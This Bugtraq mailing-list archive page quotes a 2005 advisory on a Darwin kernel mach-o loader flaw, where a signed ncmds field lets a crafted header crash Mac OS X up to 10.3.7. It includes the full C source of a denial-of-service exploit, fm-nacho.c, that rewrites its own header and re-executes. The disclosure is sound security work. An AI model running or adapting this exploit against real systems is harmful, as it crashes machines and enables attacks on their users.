Bugtraq mailing list archives
Re: Darwin Kernel Vulnerability
From: neil () darkridge org
Date: Thu, 20 Jan 2005 09:07:24 +0800
On Wed, Jan 19, 2005 at 11:53:15AM -0800, nemo () felinemenace org wrote:
"moderator: resending this mail since it appears to of got dropped, if not, please ignore this message. _,'| _.-''``-...___..--';) /_ \'. __..-' , ,--...--''' <\ .`--''' ` /' `-';' ; ; ; __...--'' ___...--_..' .;.' fL (,__....----''' (,..--'' felinemenace.orgProgram: Darwin Kernel 7.1
Effects <= Darwin Kernel 7.7.0 Sorry about the rushed advisory. - nemo
Impact: DoS, Possible local privilege escalation. Discovered: 8th January 2005 by nemo -( nemo @ felinemenace.org )- Writeup and exploits: 1) Background Numerous bugs exist in the Darwin Kernel used by Mac OSX 10.3 Some of the bugs we investigated exist due to lack of input validation in the mach-o loader. 2) Description In the file bsd/kern/mach_loader.c the mach-o header is parsed and for the most part each field is trusted to be acceptable. In the mach-o loader code (parse_machfile()) ncmds and offset are both declared as signed integers, however the appropriate structs used to read from the file are unsigned. After a little investigation a DoS was quickly written to set ncmds to -1. ncmds = header->ncmds; while (ncmds--) { The attached code will cause a denial of service on MacOSX <= 10.3.7 3) Notes During our audit of the Darwin Kernel many bugs stood out, however we have not had time to follow through on most of them. Something that caught our attention was the misuse of the copyinstr() command. This function will not force a NULL character to be appended to the string copied in, however it seems in many cases the size passed to the function doesn't take this into account. Unfortunately, as security goes, its all about who posts first. http://www.immunitysec.com/downloads/nukido.pdf 4) Vendor status/notes/fixes/statements Apple have been notified about this bug. 5) Exploit //---------------------( fm-nacho.c )-------------------------- /* * DoS for Darwin Kernel Version < 7.5.0 * -(nemo () pulltheplug org)- * 2005 * * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;) * irc.pulltheplug.org (#social) */ #include <stdio.h> int main(int ac, char **av) { FILE *me; int rpl = 0xffffffff; fpos_t pos = 0x10; printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n"); printf("-( nemo () pulltheplug org )-\n\n"); printf("[+] Opening file for writing.\n"); if(!(me = fopen(*av,"r+"))) { printf("[-] Error opening exe.\n"); exit(1); } printf("[+] Seeking to ncmds.\n"); if((fsetpos(me,&pos)) == -1) { printf("[-] Error seeking to ncmds.\n"); exit(1); } printf("[+] Changing ncmds to 0x%x.\n",rpl); if(fwrite(&rpl,4,1,me) < 1) { printf("[-] Error writing to file.\n"); exit(1); } fclose(me); printf("[+] Re-executing with modified mach-o header.\n"); sleep(5); if(execv(*av,av) == -1 ) { printf("[-] Error executing %s, please run manually.\n",*av); exit(1); } exit(0); // hrm }
Current thread:
- Darwin Kernel Vulnerability nemo (Jan 19)
- Re: Darwin Kernel Vulnerability neil (Jan 20)